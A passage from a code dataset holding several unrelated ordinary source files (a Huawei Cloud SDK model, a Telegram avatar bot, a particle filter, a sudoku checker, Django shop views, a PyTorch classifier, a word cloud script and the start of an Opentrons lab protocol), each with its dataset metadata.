    @property\n    def parameters(self):\n        \"\"\"Gets the parameters of this ScaleScript.\n\n        Parameters of the custom automation script, separated by spaces. The following predefined system parameters can be passed in: - ${mrs_scale_node_num}: number of nodes being added or removed - ${mrs_scale_type}: scaling type, scale_out for expansion and scale_in for shrinking - ${mrs_scale_node_hostnames}: hostnames of the nodes being scaled - ${mrs_scale_node_ips}: IP addresses of the nodes being scaled - ${mrs_scale_rule_name}: name of the rule that triggered the scaling Other user-defined parameters are used the same way as in an ordinary shell script, separated by spaces.\n\n        :return: The parameters of this ScaleScript.\n        :rtype: str\n        \"\"\"\n        return self._parameters\n\n    @parameters.setter\n    def parameters(self, parameters):\n        \"\"\"Sets the parameters of this ScaleScript.\n\n        Parameters of the custom automation script, separated by spaces. The following predefined system parameters can be passed in: - ${mrs_scale_node_num}: number of nodes being added or removed - ${mrs_scale_type}: scaling type, scale_out for expansion and scale_in for shrinking - ${mrs_scale_node_hostnames}: hostnames of the nodes being scaled - ${mrs_scale_node_ips}: IP addresses of the nodes being scaled - ${mrs_scale_rule_name}: name of the rule that triggered the scaling Other user-defined parameters are used the same way as in an ordinary shell script, separated by spaces.\n\n        :param parameters: The parameters of this ScaleScript.\n        :type parameters: str\n        \"\"\"\n        self._parameters = parameters\n\n    @property\n    def nodes(self):\n        \"\"\"Gets the nodes of this ScaleScript.\n\n        Names of the node groups on which the custom automation script runs.\n\n        :return: The nodes of this ScaleScript.\n        :rtype: list[str]\n        \"\"\"\n        return self._nodes\n\n    @nodes.setter\n    def nodes(self, nodes):\n        \"\"\"Sets the nodes of this ScaleScript.\n\n        Names of the node groups on which the custom automation script runs.\n\n        :param nodes: The nodes of this ScaleScript.\n        :type nodes: list[str]\n        \"\"\"\n        self._nodes = nodes\n\n    @property\n    def active_master(self):\n        \"\"\"Gets the active_master of this ScaleScript.\n\n        Whether the custom automation script runs only on the active Master node. Defaults to false, meaning the script may run on all Master nodes.\n\n        :return: The active_master of this ScaleScript.\n        :rtype: bool\n        \"\"\"\n        return self._active_master\n\n    @active_master.setter\n    def active_master(self, active_master):\n        \"\"\"Sets the active_master of this ScaleScript.\n\n        Whether the custom automation script runs only on the active Master node. Defaults to false, meaning the script may run on all Master nodes.\n\n        :param active_master: The active_master of this ScaleScript.\n        :type active_master: bool\n        \"\"\"\n        self._active_master = active_master\n\n    @property\n    def fail_action(self):\n        \"\"\"Gets the fail_action of this ScaleScript.\n\n        Whether to continue executing subsequent scripts and creating the cluster after the custom automation script fails to execute. Notes: - Setting this to 'continue' is recommended while debugging, so that the cluster continues to install and start regardless of whether the script succeeds. - Because a successful scale-in cannot be rolled back, fail_action must be set to 'continue' for scripts executed after a scale-in. Enum values: - continue: continue executing subsequent scripts. - errorout: abort the operation.\n\n        :return: The fail_action of this ScaleScript.\n        :rtype: str\n        \"\"\"\n        return self._fail_action\n\n    @fail_action.setter\n    def fail_action(self, fail_action):\n        \"\"\"Sets the fail_action of this ScaleScript.\n\n        Whether to continue executing subsequent scripts and creating the cluster after the custom automation script fails to execute. Notes: - Setting this to 'continue' is recommended while debugging, so that the cluster continues to install and start regardless of whether the script succeeds. - Because a successful scale-in cannot be rolled back, fail_action must be set to 'continue' for scripts executed after a scale-in. Enum values: - continue: continue executing subsequent scripts. - errorout: abort the operation.\n\n        :param fail_action: The fail_action of this ScaleScript.\n        :type fail_action: str\n        \"\"\"\n        self._fail_action = fail_action\n\n    @property\n    def action_stage(self):\n        \"\"\"Gets the action_stage of this ScaleScript.\n\n        When the script runs. Enum values: - before_scale_out: before scale-out - before_scale_in: before scale-in - after_scale_out: after scale-out - after_scale_in: after scale-in\n\n        :return: The action_stage of this ScaleScript.\n        :rtype: str\n        \"\"\"\n        return self._action_stage\n\n    @action_stage.setter\n    def action_stage(self, action_stage):\n        \"\"\"Sets the action_stage of this ScaleScript.\n\n        When the script runs. Enum values: - before_scale_out: before scale-out - before_scale_in: before scale-in - after_scale_out: after scale-out - after_scale_in: after scale-in\n\n        :param action_stage: The action_stage of this ScaleScript.\n        :type action_stage: str\n        \"\"\"\n        self._action_stage = action_stage\n
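\n    # Note: to_dict()/to_str() below are the stock huaweicloudsdk model\n    # serialisers: they walk openapi_types, recurse into nested models, and mask\n    # any attribute listed in sensitive_list.\n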
    def to_dict(self):\n        \"\"\"Returns the model properties as a dict\"\"\"\n        result = {}\n\n        for attr, _ in six.iteritems(self.openapi_types):\n            value = getattr(self, attr)\n            if isinstance(value, list):\n                result[attr] = list(map(\n                    lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n                    value\n                ))\n            elif hasattr(value, \"to_dict\"):\n                result[attr] = value.to_dict()\n            elif isinstance(value, dict):\n                result[attr] = dict(map(\n                    lambda item: (item[0], item[1].to_dict())\n                    if hasattr(item[1], \"to_dict\") else item,\n                    value.items()\n                ))\n            else:\n                if attr in self.sensitive_list:\n                    result[attr] = \"****\"\n                else:\n                    result[attr] = value\n\n        return result\n\n    def to_str(self):\n        \"\"\"Returns the string representation of the model\"\"\"\n        import simplejson as json\n        if six.PY2:\n            import sys\n            reload(sys)\n            sys.setdefaultencoding(\"utf-8\")\n        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n    def __repr__(self):\n        \"\"\"For `print`\"\"\"\n        return self.to_str()\n\n    def __eq__(self, other):\n        \"\"\"Returns true if both objects are equal\"\"\"\n        if not isinstance(other, ScaleScript):\n            return False\n\n        return self.__dict__ == other.__dict__\n\n    def __ne__(self, other):\n        \"\"\"Returns true if both objects are not equal\"\"\"\n        return not self == other\n","sub_path":"huaweicloud-sdk-mrs/huaweicloudsdkmrs/v2/model/scale_script.py","file_name":"scale_script.py","file_ext":"py","file_size_in_byte":12650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42015197","text":"from flask import Flask, request\nimport telegram\nfrom telebot.credentials import bot_token, bot_user_name, URL\nimport re\n\nTOKEN = bot_token\nbot = telegram.Bot(token=TOKEN)\n\napp = Flask(__name__)\n\n@app.route('/{}'.format(TOKEN), methods=['POST'])\ndef respond():\n    update = telegram.Update.de_json(request.get_json(force=True), bot)\n    chat_id = update.message.chat.id\n    msg_id = update.message.message_id\n    text = update.message.text.encode('utf-8').decode()\n    print(\"got text message:\", text)\n\n    if text == \"/start\":\n        bot_welcome = \"\"\"\n        Welcome to CoolAvatar bot, which uses the service from\n        http://avatars.adorable.io/ to generate cool looking avatars based on the\n        name you enter, so please enter a name and the bot will reply\n        with an avatar for your name.\n        \"\"\"\n        bot.sendMessage(chat_id = chat_id, text=bot_welcome, reply_to_message_id=msg_id)\n    else:\n        try:\n            text = re.sub(r\"\\W\", \"_\", text)\n            url = \"https://api.adorable.io/avatars/285/{}.png\".format(text.strip())\n            bot.sendPhoto(chat_id=chat_id, photo=url, reply_to_message_id = msg_id)\n        except Exception:\n            bot.sendMessage(chat_id=chat_id, text=\"There was a problem with the name, try again\", reply_to_message_id=msg_id)\n    \n    return 'ok'\n\n@app.route('/set_webhook', methods=['GET', 'POST'])\ndef set_webhook():\n    s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n    if s:\n        return \"webhook setup ok\"\n    else:\n        return \"webhook setup failed\"\n\n@app.route('/')\ndef index():\n    return '.'\n\nif __name__ == '__main__':\n    app.run(threaded=True)\n\n","sub_path":"telebot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491748474","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\npddata=pd.read_csv('Nile.csv')\nprint(pddata.iloc[:,1].head())\npddata.plot(figsize=(12,4))\nplt.show()\ndata=np.array(pddata.iloc[:,1])\n\n\n# ### Nonlinear / non-Gaussian state space model\n# $\n# \\begin{align}\n# x_{t}&=f_{t}(x_{t-1},\\upsilon_{t})\\\\\n# y_{t}&=h_{t}(x_{t},\\omega_{t})\n# \\end{align}\n# $\n\n# In[ ]:\n\nclass ParticleFilter:\n    def __init__(self,y,n_particle,upsilon2,omega2):\n        self.y=y\n        self.length=len(y)\n        self.length_of_time=len(y)\n        self.n_particle=n_particle\n        self.upsilon2=upsilon2\n        self.omega2=omega2\n        self.filtered_value = np.zeros(self.length)\n        print('OK!!')\n    \n    def init_particle(self):\n        # x(i)_0|0\n        particles = []\n        predicts = []\n        init=np.random.uniform(400,1600,self.n_particle)\n        particles.append(init)\n        predicts.append(init)\n        return({'particles':particles,'predicts':predicts})\n    
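\n    # Note on the particle weights: under the Gaussian observation assumption\n    # in get_likelihood() below, the unnormalised weight of particle i at time t\n    # is p(y_t | x_t^(i)) = N(y_t; x_t^(i), omega2); filtering() then normalises\n    # the weights and resumpling() draws the next particle set from them.\n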
    def get_likelihood(self,ensemble,t):\n        # assume a Gaussian observation density this time\n        likelihoodes=(1/np.sqrt(2*np.pi*self.omega2))*np.exp((-1/(2*self.omega2))*((self.y[t]-ensemble[t])**2))\n        return(likelihoodes)\n    \n    def one_predict(self,ensemble,t):\n        # x(i)_t|t-1\n        noise=np.random.normal(0,np.sqrt(self.upsilon2),self.n_particle)\n        predict=ensemble[t]+noise\n        return(predict)\n    \n    def filtering(self,ensemble,t):\n        # x(i)_t|t\n        likelihood=self.get_likelihood(ensemble,t)\n        beta=likelihood/likelihood.sum()\n        #print('beta',beta)\n        filtering_value=np.sum(beta*ensemble[t])\n        return({'beta':beta,'filtering_value':filtering_value})\n    \n    def resumpling(self,ensemble,weight):\n        # sample=np.zeros(self.n_particle)\n        # for i in range(self.n_particle):\n        #     sample[i]=np.random.choice(ensemble,p=weight)\n        sample=np.random.choice(ensemble,p=weight,size=self.n_particle)\n        return(sample)\n    \n    def simulate(self,seed=123):\n        np.random.seed(seed)\n        # draw the initial particle cloud once and reuse it for both lists\n        init=self.init_particle()\n        particles=init['particles']\n        predicts=init['predicts']\n        filtered_value=np.zeros(self.length)\n        filtered_value[0]=np.sum(particles[0])/self.n_particle\n        for t in np.arange(1,self.length):\n            print(\"\\r calculating... t={}\".format(t), end=\"\")\n            # one-step-ahead prediction\n            predicts.append(self.one_predict(particles,t-1))\n            # filtering (weight and average the predicted particles)\n            filtered=self.filtering(predicts,t-1)\n            filtered_value[t]=filtered['filtering_value']\n            resumple=self.resumpling(predicts[t-1],filtered['beta'])\n            particles.append(resumple)\n        return({'particles':particles,'predicts':predicts,'filtered_value':filtered_value})\n\n\n# In[ ]:\n\nmodel=ParticleFilter(data,10000,np.exp(7.3),np.exp(9.63))\n\n\n# In[ ]:\n\nresult=model.simulate()\n\n\n# In[ ]:\n\n#plt.figure(figsize=(20,9))\nfor i in range(len(pddata)):\n    if i==0:\n        plt.scatter(np.zeros(len(result['particles'][i]))+i,result['particles'][i],s=1,color='red',alpha=0.1,label='particle')\n    plt.scatter(np.zeros(len(result['particles'][i]))+i,result['particles'][i],s=1,color='red',alpha=0.1)\nplt.plot(data,color='blue',label='y')\nplt.plot(result['filtered_value'],color='green',label='estimate')\nplt.legend()\nplt.ylim(400,2000)\nplt.title('particles = {}, upsilon2 = {}, omega2 = {}'.format(model.n_particle,model.upsilon2,model.omega2))\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"code/pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121150535","text":"def isValidate(set_line):\n    validate = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"}\n    return set_line == validate\n\n\ndef sudokuCheck(sudoku):\n\n    # rows\n    for row in sudoku:\n        if not isValidate(set(row)):\n            return 0\n\n    # columns\n    zip_sudoku = list(zip(*sudoku))\n    for column in zip_sudoku:\n        if not isValidate(set(column)):\n            return 0\n\n    # 3x3 boxes, checked one band of three rows at a time;\n    # every band must be valid, so fail fast and keep scanning otherwise\n    set1 = set()\n    set2 = set()\n    set3 = set()\n    for idx, row in enumerate(sudoku):\n        set1.update(row[:3])\n        set2.update(row[3:6])\n        set3.update(row[6:])\n        if idx in [2, 5, 8]:\n            if not (isValidate(set1) and isValidate(set2) and isValidate(set3)):\n                return 0\n            # reset the three box sets before the next band of rows\n            set1 = set()\n            set2 = set()\n            set3 = set()\n    return 1\n\n\nT = int(input())\n\nfor t in range(1, T+1):\n    sudoku = []\n    for _ in range(9):\n        sudoku.append(input().split())\n\n    print(f\"#{t} {sudokuCheck(sudoku)}\")\n","sub_path":"PYTHON/SWEXPERT/익스퍼트미분류/D2/1974_스도쿠_검증/1974_1.py","file_name":"1974_1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"97767991","text":"from django.shortcuts
import render,redirect,get_object_or_404\nfrom .models import signupit,mobile_spec,cart,buy_mobiles\nfrom django.contrib.auth import login,logout\nfrom django.contrib.auth.models import auth,User\n\n# Create your views here.\ndef home(request):\n mobiles=mobile_spec.objects.all()\n print(mobiles)\n return render(request,'ECommerce/homepage.html',{'mobiles':mobiles})\n\ndef signup(request):\n if request.method=='GET':\n return render(request,'ECommerce/signup.html')\n else:\n username=request.POST.get('username')\n password1=request.POST.get('password1')\n password2=request.POST.get('password2')\n email=request.POST.get('email')\n first_name=request.POST.get('first_name')\n last_name=request.POST.get('last_name')\n user=User.objects.create_user(username=username,password=password1,email=email,first_name=first_name,last_name=last_name)\n user.save()\n auth.login(request,user)\n return render(request,'ECommerce/homepage.html')\n\ndef login(request):\n if request.method=='GET':\n return render(request,'ECommerce/login.html')\n else:\n username=request.POST.get('username')\n password=request.POST.get('password1')\n user=auth.authenticate(username=username,password=password)\n if user is not None:\n auth.login(request,user)\n return redirect(home)\n else:\n return render(request,'ECommerce/login.html',{'error':'invalid'})\n\ndef logout(request):\n auth.logout(request)\n return redirect('home')\n\ndef specifications(request,mobile_pk):\n mobile=mobile_spec.objects.filter(pk=mobile_pk)\n return render(request,'ECommerce/specifications.html',{'mobile':mobile})\n\ndef carts(request):\n if request.method=='GET': \n mobiles=cart.objects.filter(user=request.user)\n mlist=[]\n for mobile in mobiles:\n m1=mobile.cart_models.all()\n print('This is m1',m1)\n for m3 in m1:\n print('This is m3: ',m3)\n m2=mobile_spec.objects.all()\n for m in m2:\n print('This is m:',m)\n if m==m3:\n print('matched')\n mlist.append(m)\n print(mlist)\n #if m not in mlist:\n # mlist.insert(m) \n return render(request,'Ecommerce/cart.html',{'mlist':mlist}) \n\ndef add_to_cart(request,addmobile_pk):\n m4=mobile_spec.objects.filter(pk=addmobile_pk)\n print(m4)\n a1=cart(user=request.user)\n a1.save()\n p1=a1.cart_models.set(m4)\n return redirect('home')\n\ndef remove_from_cart(request,remove_mobile_pk):\n if request.method=='POST':\n m5=cart.objects.filter(user=request.user)\n m6=mobile_spec.objects.filter(pk=remove_mobile_pk)\n for m7 in m5: \n m8=m7.cart_models.all()\n for m9 in m8:\n for m10 in m6:\n print('this is m8',m8)\n print('this is m6',m6)\n print('this is m9',m9)\n print('this is m10',m10)\n if m10.model==m9.model:\n print('matched delete it',m7)\n m7.delete()\n return redirect('home')\n\ndef buy_now(request,buy_pk):\n mobile=mobile_spec.objects.filter(pk=buy_pk)\n return render(request,'ECommerce/buy_now.html',{'mobile':mobile})\n\ndef buy(request,order_pk):\n if request.method=='POST':\n m4=mobile_spec.objects.filter(pk=order_pk)\n print(m4)\n quantity1=request.POST.get('quantity')\n address1=request.POST.get('address')\n print('quantity',quantity1)\n print('address',address1)\n order=buy_mobiles(quantity=quantity1,address=address1,user=request.user)\n order.save()\n order1=order.cart_models.set(m4)\n return redirect('home')\n\ndef search(request):\n search=request.POST.get('search')\n m3=mobile_spec.objects.filter(model=search)\n print(m3)\n if m3.exists() :\n print('none')\n return render(request,'ECommerce/homepage.html',{'m3':m3})\n else:\n return render(request,'ECommerce/homepage.html',{'error':'page not 
found'})\n \n\n\n\n\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72001833","text":"import torch\nfrom torch import nn\n\nimport modules\nfrom datetime import datetime\n\nclass Embeddings(nn.Module):\n def __init__(self, embedding_dim=64):\n super(Embeddings, self).__init__()\n self.embedding_dim = embedding_dim\n self.embeddings_holiday = modules.CharacterEmbeddings(12, embedding_dim)\n self.embeddings_weather = modules.CharacterEmbeddings(11, embedding_dim)\n self.embeddings_weather_detail = modules.CharacterEmbeddings(38, embedding_dim)\n self.embeddings_month = modules.CharacterEmbeddings(12, embedding_dim)\n self.embeddings_dayofweek = modules.CharacterEmbeddings(7, embedding_dim)\n self.embeddings_hour = modules.CharacterEmbeddings(24, embedding_dim)\n\n def forward(self, data_dict):\n embed1 = self.embeddings_holiday.forward(data_dict['code_holiday'])\n embed2 = self.embeddings_weather.forward(data_dict['code_weather'])\n embed3 = self.embeddings_weather_detail.forward(data_dict['code_weather_detail'])\n embed4 = self.embeddings_month.forward(data_dict['code_month'])\n embed5 = self.embeddings_dayofweek.forward(data_dict['code_dayofweek'])\n embed6 = self.embeddings_hour.forward(data_dict['code_hour'])\n return torch.cat([embed1, embed2, embed3, embed4, embed5, embed6], 1)\n\nclass Predictor(nn.Module):\n def __init__(self):\n super(Predictor, self).__init__()\n self.linears = modules.LinearSeq(561, [1024, 128, 64, 32, 16, 6], activation_list=['relu', 'relu', 'relu', 'relu', 'relu', 'logsoftmax'])\n # self.linears = modules.LinearSeq(28, [32, 1], activation_list=['relu', None])\n\n def train(self, x_train, y_train, criterion, optimizer, num_epochs=1000):\n # hparams\n batch_size = 256\n\n # 1. set device\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n print('device:', device)\n x_train = x_train.to(device)\n y_train = y_train.to(device)\n\n # 2. network to device\n self.to(device)\n\n # 3. 
loop over epoch\n with torch.autograd.set_detect_anomaly(True):\n for epoch in range(num_epochs):\n start = datetime.now()\n print('---------------\\nEpoch ', epoch + 1, '\\n')\n epoch_loss = .0\n\n num_batches = x_train.size(0) // batch_size\n\n # 3.1 loop over batch\n batch_count = 0\n while True:\n if batch_count < num_batches:\n batch = x_train[batch_size * batch_count: batch_size * (batch_count + 1)]\n labels = y_train[batch_size * batch_count: batch_size * (batch_count + 1)].squeeze()\n else:\n batch = x_train[batch_size * batch_count:]\n labels = y_train[batch_size * batch_count:].squeeze()\n # print('Epoch:', epoch+1, '/', num_epochs, 'Batch:', batch_count, '/', num_batches)\n # 3.1.0 initialize grads\n optimizer.zero_grad()\n\n # 3.1.1 linears\n preds = self.linears.forward(batch)\n\n # 3.1.3 calc batch loss\n loss = criterion(preds, labels)\n\n # 3.1.4 calc grads\n loss.backward(retain_graph=True)\n\n # 3.1.5 update model params\n optimizer.step()\n\n # 3.1.6 add batch loss to epoch loss\n epoch_loss += loss.item() * batch.size(0)\n # print('epoch loss: ', epoch_loss)\n\n batch_count += 1\n if batch_count > num_batches:\n break\n end = datetime.now()\n # 3.2 calc epoch loss\n epoch_loss /= x_train.size(0)\n print('Epoch', epoch + 1, 'average loss:', epoch_loss, 'elapsed:', (end - start).seconds + round(\n (end - start).microseconds / 1000000, 2))\n\n def eval(self, x_test):\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n self.to(device)\n print('device:', device)\n x_test = x_test.to(device)\n with torch.no_grad():\n preds = self.linears.forward(x_test)\n return preds.max(dim=1)[1] + 1 # returns max index + 1\n\n# class Tacotron2(nn.Module):\n# def __init__(self, *args):\n# super(Tacotron2, self).__init__()\n# self.encoder = tacotron.modules.Encoder(*args)\n# self.attention = tacotron.modules.LocationSensitiveAttention(*args)\n# self.decoder = tacotron.modules.Decoder(*args)\n#\n # def pseudo_train(self, criterion, optimizer, num_epochs=100):\n # # 1. set device\n # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # print('device:', device)\n #\n # # 2. network to device\n # self.to(device)\n # batch_size = 4\n # max_input_length = 100\n # input_character_indices = torch.randint(0, 30, [3, batch_size, max_input_length])\n # labels = (torch.rand_like(self.decoder.spectrogram_pred),\n # torch.rand_like(self.decoder.spectrogram_length_pred.type(torch.float32)))\n #\n # # 3. 
loop over epoch\n # with torch.autograd.set_detect_anomaly(True):\n # for epoch in range(num_epochs):\n # print('---------------\\nEpoch ', epoch + 1, '\\n')\n # epoch_loss = .0\n # epoch_correct = 0\n #\n # # 3.1 loop over batch\n # for batch in input_character_indices:\n # # 3.1.0 initialize grads and decoder attributes\n # optimizer.zero_grad()\n # self.decoder.reset(batch_size)\n #\n # # 3.1.1 encoder\n # encoder_output, (encoder_h_n, encoder_c_n) = self.encoder(batch)\n # self.attention.h = encoder_output\n # h_prev_1 = self.decoder.h_prev_1.clone()\n # stop_token_cum = self.decoder.stop_token_cum.clone()\n #\n # # 3.1.2 loop over decoder step\n # for decoder_step in range(self.decoder.max_output_time_length):\n # print('\\n---------------------', 'decoder step: ', decoder_step + 1)\n # context_vector = self.attention.forward(h_prev_1, stop_token_cum)\n # h_prev_1, stop_token_cum = self.decoder.forward(context_vector)\n # if not any(\n # stop_token_cum): # stop decoding if no further prediction is needed for any samples in batch\n # break\n #\n # # 3.1.3 calc batch loss\n # length_pred_norm = self.decoder.spectrogram_length_pred.type(\n # torch.float32) / self.decoder.max_output_time_length\n # preds = (self.decoder.spectrogram_pred, length_pred_norm)\n # loss = criterion(preds, labels)\n #\n # # 3.1.4 calc grads\n # loss.backward()\n #\n # # 3.1.5 update model params\n # optimizer.step()\n #\n # # 3.1.6 add batch loss to epoch loss\n # epoch_loss += loss.item() * batch.size(0)\n #\n # # 3.2 calc epoch loss\n # epoch_loss /= input_character_indices.size(0) * input_character_indices.size(1)\n\n # def train(self, dataloaders_dict, criterion, optimizer, num_epochs=100):\n # # 1. set device\n # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # print('device:', device)\n # # 2. network to device\n # self.net.to(device)\n # # 3. loop over epoch\n # for epoch in range(num_epochs):\n # for phase in ['train', 'val']:\n # if phase == 'train':\n # self.net.train()\n # else:\n # self.net.eval()\n #\n # # 5. initialize loss per phase\n # epoch_loss = .0\n # epoch_correct = 0\n #\n # # 7. iterate dataloader\n # for input_character_indices, spectrogram_labels in tqdm(\n # dataloaders_dict[phase]): # dataloader는 자체로 iterable\n # # 8. dataset to device\n # input_character_indices = input_character_indices.to(device)\n # spectrogram_labels = spectrogram_labels.to(device)\n #\n # # 9. initialize grad\n # optimizer.zero_grad()\n #\n # # 10. forward\n # with torch.set_grad_enabled(\n # mode=(phase == 'train')): # enable grad only when training # with + context_manager\n # # Encoder\n # encoder_output, (encoder_h_n, encoder_c_n) = self.encoder.forward(input_character_indices)\n # # Attention&Decoder\n # self.attention.h = encoder_output # attention.h.Size([input length, batch, encoder output units])\n # self.decoder.reset(batch_size)\n # h_prev_1, stop_token_cum = self.decoder.h_prev_1, self.decoder.stop_token_cum # Local variable to speed up\n # for decoder_step in range(self.decoder.max_output_time_length):\n # print('\\n---------------------', 'decoder step: ', decoder_step + 1)\n # context_vector = self.attention.forward(h_prev_1, stop_token_cum)\n # h_prev_1, stop_token_cum = self.decoder.forward(context_vector)\n # if not any(stop_token_cum): # stop decoding if no further prediction is needed for any samples in batch\n # break\n #\n # # Calc loss\n # loss = criterion(self.decoder.spectrogram_pred, spectrogram_labels)\n #\n # # 11. 
(training)calc grad\n # if phase == 'train':\n # loss.backward()\n # # 12. (training)update parameters\n # optimizer.step()\n #\n # # 13. add loss and correct per minibatch per phase\n # epoch_loss += loss.item() * input_character_indices.size(0)\n #\n # # 14. print epoch summary\n # epoch_loss /= len(dataloaders_dict[phase].dataset) ## len(dataloader): num of datum\n #\n # print('Epoch loss: {:.4f}'.format(epoch_loss))\n\n\n# def checkup():\n# taco = Tacotron2()\n# criterion = tacotron.loss_function.Taco2Loss()\n# optimizer = torch.optim.Adam(taco.parameters())\n# taco.pseudo_train(criterion=criterion,\n# optimizer=optimizer,\n# num_epochs=3)\n#\n#\n# checkup()\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397149640","text":"import jieba\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\n\n# read the input file\ntext = open(r'test.txt','r').read()\n# use jieba to segment the text into words\nresult_word = jieba.cut(text,cut_all=True)\n# list to hold the segmented words\nstr = []\n# read the segmented words and store them in str\nfor item in result_word:\n if len(item) >= 1 and item != '\\r\\n':\n str.append(item)\n# store every word --> key: word, value: number of occurrences\ndict = {}\n# count how many times each word appears and store the counts in dict\nfor key in str:\n dict[key] = dict.get(key, 0) + 1\nprint(dict)\n# the mask image we need\nalice_coloring = np.array(Image.open(r\"alice_color.png\"))\n# use WordCloud from the wordcloud package; STOPWORDS.add() returns None, so pass the updated set instead\nwc = WordCloud(background_color=\"white\", max_words=2000,mask=alice_coloring,stopwords=STOPWORDS.union({\"said\"}), max_font_size=40,random_state=42)\n\nwc.generate_from_frequencies(dict)\nplt.imshow(wc)\nplt.axis(\"off\")\nplt.show()\nwc.to_file(\"result.png\")","sub_path":"test2/8-11/practice9.py","file_name":"practice9.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267737952","text":"import os\n# heroku config:set HEROKU=1\n# so we can run debug mode locally, not on heroku\n# note: environment variables are strings, so compare against '1'\nIS_HEROKU = os.environ.get('HEROKU') == '1'\n\nDEFAULT_OUTPUT_FILE = 'output/data.json'\n\nSITES = ['http://news.yahoo.com/',\n 'https://news.google.com/',\n 'http://www.huffingtonpost.com/',\n 'http://www.cnn.com/',\n 'http://www.nytimes.com/']","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91178954","text":"import uuid\n\nfrom setuptools import setup\nfrom pip.req import parse_requirements\n\nimport versioneer\n\nrequirements = [str(ir.req) for ir in parse_requirements('requirements.txt', session=uuid.uuid1())]\n\nDATA_FILES = [\n 'requirements.txt',\n 'versioneer.py',\n]\n\nTEST_DEPS = [\n 'nose',\n 'nose-parameterized',\n 'mock',\n]\n\nsetup(\n name='pysteam',\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n description='Python library to work with Steam',\n url='http://github.com/scottrice/pysteam',\n author='Scott Rice',\n author_email='',\n license='MIT',\n packages=['pysteam'],\n install_requires=requirements,\n data_files=DATA_FILES,\n dependency_links=[\n ],\n zip_safe=False,\n test_suite='nose.collector',\n tests_require=TEST_DEPS,\n extras_require={'test': TEST_DEPS},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"151319865","text":"import os\nimport json\nimport math\n\n\n# metadata\nmetadata = {\n 'protocolName': 'Redo Replacement Picking (Greiner MASTERBLOCK 96 Well \\\nPlate 1000 µL)',\n 'author': 'Nick ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.11'\n}\n\n\ndef run(ctx):\n\n tip_track = True\n\n [input_file, input_file2, tuberack_scan, plate_scan, tuberack_scan2,\n plate_scan2, default_disposal_vol, default_transfer_vol,\n p300_mount] = get_values( # noqa: F821\n 'input_file', 'input_file2', 'tuberack_scan', 'plate_scan',\n 'tuberack_scan2', 'plate_scan2', 'default_disposal_vol',\n 'default_transfer_vol', 'p300_mount')\n\n # load labware\n rack = ctx.load_labware('eurofins_96x2ml_tuberack', '2', 'tuberack')\n\n plates = [ctx.load_labware('greinermasterblock_96_wellplate_1000ul', '4')]\n\n if input_file2:\n plates.append(\n ctx.load_labware('greinermasterblock_96_wellplate_1000ul', '1'))\n\n tips300 = [\n ctx.load_labware('opentrons_96_tiprack_300ul', slot)\n for slot in ['11']]\n\n # pipette\n p300 = ctx.load_instrument('p300_single_gen2', p300_mount,\n tip_racks=tips300)\n\n tip_log = {val: {} for val in ctx.loaded_instruments.values()}\n\n folder_path = '/data/tip_track'\n tip_file_path = folder_path + '/tip_log.json'\n if tip_track and not ctx.is_simulating():\n if os.path.isfile(tip_file_path):\n with open(tip_file_path) as json_file:\n data = json.load(json_file)\n for pip in tip_log:\n if pip.name in data:\n tip_log[pip]['count'] = data[pip.name]\n else:\n tip_log[pip]['count'] = 0\n else:\n for pip in tip_log:\n tip_log[pip]['count'] = 0\n else:\n for pip in tip_log:\n tip_log[pip]['count'] = 0\n\n for pip in tip_log:\n if pip.type == 'multi':\n tip_log[pip]['tips'] = [tip for rack in pip.tip_racks\n for tip in rack.rows()[0]]\n else:\n tip_log[pip]['tips'] = [tip for rack in pip.tip_racks\n for tip in rack.wells()]\n tip_log[pip]['max'] = len(tip_log[pip]['tips'])\n\n def _pick_up(pip, loc=None):\n if tip_log[pip]['count'] == tip_log[pip]['max'] and not loc:\n ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \\\nresuming.')\n pip.reset_tipracks()\n tip_log[pip]['count'] = 0\n if loc:\n pip.pick_up_tip(loc)\n else:\n pip.pick_up_tip(tip_log[pip]['tips'][tip_log[pip]['count']])\n tip_log[pip]['count'] += 1\n\n # check barcode scans (tube, plate)\n tuberack_bar, plate_bar = 